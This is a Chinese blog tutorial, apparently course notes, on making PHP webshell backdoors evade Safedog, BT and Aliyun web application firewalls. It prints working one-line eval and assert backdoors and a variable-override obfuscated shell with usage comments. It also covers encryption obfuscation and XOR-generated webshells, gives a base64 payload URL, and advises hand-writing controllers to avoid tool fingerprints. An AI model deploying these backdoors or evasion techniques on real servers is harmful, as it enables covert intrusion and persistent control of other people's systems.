思维导图
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-F6lVKsnS-1649647185215)(image48/权限控制.png)]](https://img-blog.csdnimg.cn/c7ebcd96a90a4f37abec4ae03c1b4131.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
Safedog 代码层手写及脚本绕过
变量覆盖,加密混淆,异或生成
BT Aliyun 代码层手写及脚本绕过
编码解码(变量覆盖,加密混淆,异或生成)
ASP,PHP,ASPX,JSP,PY 等后门免杀同理
一句话后门的原理:
<?php@eval($_POST['password']) ?>
- @再php中含义为后面如果执行错误不会报错
- eval()函数表示括号里的语句全做代码执行
- $_POST[‘password’]`表示从页面中以post方式获取变量password的值。
菜刀、蚂剑、冰蝎工具的基本原理
把一些具体执行语句集成化(各种各样在功能语句都帮你写好了),你直接连接执行就可!
菜刀,蚁剑,冰蝎优缺点
菜刀:未更新状态,无插件,单向加密传输
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,偏向于后渗透,双向加密传输
冰蝎加密原理
冰蝎"在服务端支持open_ssl时,使用AES加密算法,密钥长度16位,也可称为AES-16。此在软件及硬件(英特尔处理器的AES指令集包含六条指令)上都能快速地加解密,内存需求低,非常适合流量加密。
加密流程
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cNmdc5xO-1649647185218)(image48/48-28.jpeg)]](https://img-blog.csdnimg.cn/5975947bf6c9406ba217ab4b5accd6b3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_19,color_FFFFFF,t_70,g_se,x_16)
首先客户端以Get形式发起带密码的请求。
服务端产生随机密钥,将密钥写入Session并将密钥返回客户端。
客户端获取密钥后,将payload用AES算法加密,用POST形式发送请求。
服务端收到请求,用Session中的密钥解密请求的Body部分,之后执行Payload,将直接结果返回到客户端。
客户端获取返回结果,显示到UI界面上。
变量覆盖
原型后门
<?php assert($_POST['chopper'])?>
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZRoCSQEQ-1649647185219)(image48/48-0.png)]](https://img-blog.csdnimg.cn/cdbf956fac054800b3cd76f54ff3ea96.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
安全狗轻而易举就查到木马
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-txqwFuOY-1649647185220)(image48/48-1.png)]](https://img-blog.csdnimg.cn/5aa19b3d958349eca7168410e0dfa0da.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
变量覆盖
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ahz5j5Rj-1649647185220)(image48/48-5.png)]](https://img-blog.csdnimg.cn/20227d74223d4ddda3b4d0d6c83a0f0d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
<?php
$a = $_GET['x'];
$$a = $_GET['y'];
$b($_POST['z']);
//?x=b&y=assert
//$a = b
//$$a ->$b 变量引用
//$b= assert
//$b($_POST['z']);--->assert($_POST['z'])
?>
把敏感字符传递的参数中,waf能够确定你的代码,但是确定不了你传递的参数值
safedog有变量追踪
简单的拆分,直接报马
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W759tuas-1649647185221)(image48/48-6.png)]](https://img-blog.csdnimg.cn/0067558f0e18492fbd3b9f99cc8ae918.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TOiYucfs-1649647185222)(image48/48-9.png)]](https://img-blog.csdnimg.cn/521c0c61e7a74f109f8f9d6c7726d27a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XXkZ3ZwJ-1649647185222)(image48/48-8.png)]](https://img-blog.csdnimg.cn/13bab5b56ce4462581417ace2f1193a4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
原型效果
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QdbYkfMe-1649647185223)(image48/48-10.png)]](https://img-blog.csdnimg.cn/2618ca5c04004636a834a90051aaf98c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qyYom7Yh-1649647185223)(image48/48-2.png)]](https://img-blog.csdnimg.cn/99dd3cfedbdf4f5bbb3c3f8fa32edf4e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
变量覆盖效果(本地safedog测试)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yN2LqXHV-1649647185224)(image48/48-7.png)]](https://img-blog.csdnimg.cn/e2ddb64b905b47928ac74c77c797c46d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
变量覆盖效果(aliyun+safedog +bt 测试)
被BT拦截
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bcQGnOwZ-1649647185224)(image48/48-12.png)]](https://img-blog.csdnimg.cn/b0ab3a4793ab452f8f64ce8987c5709b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
传入值触发防护规则
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nseSB5uX-1649647185225)(image48/48-11.png)]](https://img-blog.csdnimg.cn/2e02f0fd12f74adaa7c499e9ede292e2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
加密绕过即可
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6oelY00R-1649647185225)(image48/48-15.png)]](https://img-blog.csdnimg.cn/167176dfec394d2fbdeda60c10dc59fd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HQJhrwsu-1649647185226)(image48/48-13.png)]](https://img-blog.csdnimg.cn/1367d0fca7414f6b925dda5bbb375232.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
稳定、可靠
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DUJReJJ9-1649647185226)(image48/48-14.png)]](https://img-blog.csdnimg.cn/3b282ce876ef41f9ace2b42c2064f9b7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
加密混淆
enphp工具
运行
php.exe code_test.php
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bNjq4m4S-1649647185227)(image48/48-17.png)]](https://img-blog.csdnimg.cn/302b9f6781e04601bf5273b7fa191753.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3UJTRJUB-1649647185227)(image48/48-18.png)]](https://img-blog.csdnimg.cn/c3f29315e85c4423a44d3fe76cebbcf8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VeCxTMgf-1649647185228)(image48/48-16.png)]](https://img-blog.csdnimg.cn/0db66d756671491fbb7b15915c520099.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5kBzjNmD-1649647185228)(image48/48-19.png)]](https://img-blog.csdnimg.cn/9349577f4a3f4bf78be51d43b338adc9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SCV6DF88-1649647185229)(image48/48-20.png)]](https://img-blog.csdnimg.cn/f00f34c928b34d4ebd1d7389d433f7f3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
网络接口加密(更稳)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kfee3KNj-1649647185229)(image48/48-21.png)]](https://img-blog.csdnimg.cn/c9bd11f948c942ed86722ae659a28928.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WeNW5Py8-1649647185229)(image48/48-22.png)]](https://img-blog.csdnimg.cn/813780ef2fc24b7cb1c9a9a67dbb310e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OqLCcAQi-1649647185230)(image48/48-23.png)]](https://img-blog.csdnimg.cn/b56c93a6ad2a497e8458349383af6f4c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
依旧很稳
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PnTSmmGv-1649647185230)(image48/48-24.png)]](https://img-blog.csdnimg.cn/5f48c42a65ff4e83bfe6bdf32e999b44.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
异或生成
webshell-venom-master工具
直接运行程序,即可生成webshell
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aklxeZpy-1649647185230)(image48/48-25.png)]](https://img-blog.csdnimg.cn/eb6ee88aabe64c3d90ec6bd4affcf930.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
免杀
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nhyVXl3h-1649647185231)(image48/48-26.png)]](https://img-blog.csdnimg.cn/5f622477317d489ea014a15adbaf8da4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
很稳
http://test.xiaodi8.com/x.php?id=x
mr6=cGhwaW5mbygpOw==
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W3bp2w43-1649647185231)(image48/48-27.png)]](https://img-blog.csdnimg.cn/391f50c91530469683e92ec0e12f845e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
行为造轮子
waf基本都有菜刀、蚁剑、冰蝎的指纹,当你使用他们的时候,一些危害行为会被拦截!
要想不被识别拦截,只能自己造轮子!
自己写数据包,不会有那些指纹特征,就能实现功能!
扫描目录
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eonCWARz-1649647185232)(image48/48-32.png)]](https://img-blog.csdnimg.cn/fc28571455fc429fa9fec70a17f580bc.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
写入文件
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bp1PI60J-1649647185232)(image48/48-33.png)]](https://img-blog.csdnimg.cn/f3e58f9869ce4731a3d2c77c037d949b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
手写手写新型控制器
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dpJ7uBx3-1649647185232)(image48/48-37.png)]](https://img-blog.csdnimg.cn/f27dc7fd5ba44752a10f8c09b2dfe71b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASXNlY05vb2I=,size_20,color_FFFFFF,t_70,g_se,x_16)
演示案例
Safedog-手写覆盖变异简易代码绕过-代码层
Safedog-基于接口类加密混淆代码绕过-代码层
BT,Aliyun-基于覆盖加密变异下编码解码绕过-代码层
Safedog-基于工具功能数据包指纹修改变异绕过-行为层
Safedog,BT,Aliyun-基于冰蝎新型控制器绕过全面测试-行为层
Safedog,BT,Aliyun-基于手写新型控制器绕过全面测试-行为层
涉及资源:
https://github.com/djunny/enphp
https://www.phpjiami.com/phpjiami.html
https://github.com/rebeyond/Behinder/releases/
https://github.com/AntSwordProject/antSword/releases
https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:
xiao
285
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
